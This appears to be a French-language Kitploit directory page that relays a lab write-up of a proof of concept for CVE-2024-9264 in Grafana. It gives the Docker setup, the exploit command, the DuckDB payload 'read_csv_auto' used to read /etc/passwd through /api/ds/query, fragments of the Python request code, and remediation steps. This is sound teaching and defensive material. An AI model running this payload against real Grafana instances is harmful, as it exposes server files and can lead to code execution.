Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9264 — Exploit PoC pour CVE-2024-9264 : vulnérabilité d'expression SQL dans Grafana permettant l'inclusion locale de fichiers et l'exécution de code à distance via une injection SQL DuckDB. Comprend la configuration d'un lab Docker et un script d'exploit Python. | Kitploit
Outils/GitHubGitHub/yeonchoda/cve-2024-9264
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubyeonchoda/cve-2024-9264

CVE-2024-9264

Exploit PoC pour CVE-2024-9264 : vulnérabilité d'expression SQL dans Grafana permettant l'inclusion locale de fichiers et l'exécution de code à distance via une injection SQL DuckDB. Comprend la configuration d'un lab Docker et un script d'exploit Python.

Voir le dépôt
3il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-9264

Document de référence https://github.com/vulhub/vulhub/tree/master/grafana/CVE-2024-9264

1. Résumé de la vulnérabilité

ÉlémentDescription
CVECVE-2024-9264
CibleGrafana (SQL Expressions)
ImpactLocal File Inclusion (LFI), Remote Code Execution (RCE)
SévéritéCritical (CVSS 9.9)
Condition d'attaqueUtilisateur authentifié (privilèges Admin)
Méthode d'attaqueExploitation de la fonction SQL Expression pour exécuter DuckDB SQL

Grafana est un outil de monitoring open source qui visualise diverses données (serveurs, applications, bases de données, etc.) sous forme de graphiques ou de tableaux de bord faciles à lire.

CVE-2024-9264 est une vulnérabilité dans la fonction SQL Expressions de Grafana.

DuckDB SQL utilisé en interne par Grafana n'est pas correctement validé, ce qui permet à un attaquant d'exécuter du DuckDB SQL arbitraire via une expression SQL.

Cela peut être utilisé pour :

  • Lire des fichiers locaux du serveur (LFI)
  • Exécuter des commandes système (RCE)
  • Fuiter des informations sensibles

etc.

Dans cette pratique, nous avons exécuté Grafana 11.0.0 dans un environnement Docker, puis reproduit la vulnérabilité en lisant le fichier /etc/passwd à l'aide d'un PoC.


2. Configuration de l'environnement

Environnement de pratique

ComposantDescription
OSUbuntu
DockerDocker Compose
Grafana11.0.0

Téléchargement du dépôt

root@kitploit:~
git clone https://github.com/yeonchoda/CVE-2024-9264
cd CVE-2024-9264

Exécution Docker

root@kitploit:~
docker-compose up

Vérification de l'exécution de Grafana

root@kitploit:~
http://localhost:3000

Exécution de Grafana

Les informations de compte par défaut de Grafana sont les suivantes :

root@kitploit:~
ID : admin
PW : admin

3. Conditions de vulnérabilité

Pour que la vulnérabilité se produise, les conditions suivantes doivent être remplies :

  • Utilisation d'une version vulnérable de Grafana
  • Fonction SQL Expressions disponible
  • L'attaquant peut se connecter à Grafana
  • DuckDB SQL Expression est activé

Dans cette pratique, nous avons utilisé le compte administrateur par défaut (admin/admin).


4. Reproduction

Exécution du PoC

Pour lire un fichier local, la commande suivante a été exécutée :

root@kitploit:~
python3 PoC.py -u http://localhost:3000 -f "/etc/passwd"

Le PoC génère l'expression SQL suivante :

root@kitploit:~
SELECT * FROM read_csv_auto('/etc/passwd')

Il l'envoie à l'API /api/ds/query de Grafana.


Vérification des résultats

Grafana a exécuté le SQL tel quel et a renvoyé le contenu de /etc/passwd dans la réponse.

Exécution de PoC.py

D'autres fichiers que /etc/passwd peuvent également être consultés. Output de /etc/group

Cela confirme que l'inclusion de fichier local (LFI) a été réalisée avec succès.


5. Code du PoC

Le PoC est écrit en Python et effectue les étapes suivantes :

  1. Appel à l'API Grafana (/api/ds/query)
  2. Création d'une expression SQL
  3. Envoi de la requête au format JSON
  4. Analyse de la réponse (JSON)
  5. Affichage du contenu du fichier

Le SQL généré lors de la lecture du fichier est le suivant :

root@kitploit:~
sql_query = f"SELECT * FROM read_csv_auto('{args.file}')"

La requête API est effectuée comme suit :

root@kitploit:~
response = requests.post(
    api_url,
    auth=(username, password),
    headers=headers,
    data=json.dumps(payload),
    verify=False
)

Cela peut également être vérifié avec la commande curl. curl

6. Mesures de remédiation

1. Mise à jour vers la dernière version de Grafana

La méthode de remédiation la plus efficace consiste à mettre à jour vers la dernière version corrigeant la vulnérabilité.


2. Limitation de la fonction SQL Expressions

Désactiver la fonction SQL Expressions si elle n'est pas nécessaire, ou limiter sa portée en appliquant le principe du moindre privilège.


3. Protection du compte administrateur

  • Changer le compte par défaut (admin/admin)
  • Utiliser un mot de passe fort
  • Minimiser le nombre de comptes administrateur

Conclusion

Après avoir déployé Grafana 11.0.0 dans un environnement Docker, nous avons reproduit la vulnérabilité CVE-2024-9264.

En utilisant un PoC écrit en Python, nous avons exploité la fonction SQL Expression et réussi à lire le fichier /etc/passwd.

Cela confirme qu'une validation insuffisante des entrées de l'expression SQL peut exposer des fichiers sensibles et, selon l'environnement, peut également conduire à une exécution de code à distance (RCE). Ces vulnérabilités peuvent être évitées grâce à des mesures de sécurité telles que la mise à jour vers la dernière version, la limitation de la fonction SQL Expressions et la protection du compte administrateur.

Télécharger l’outil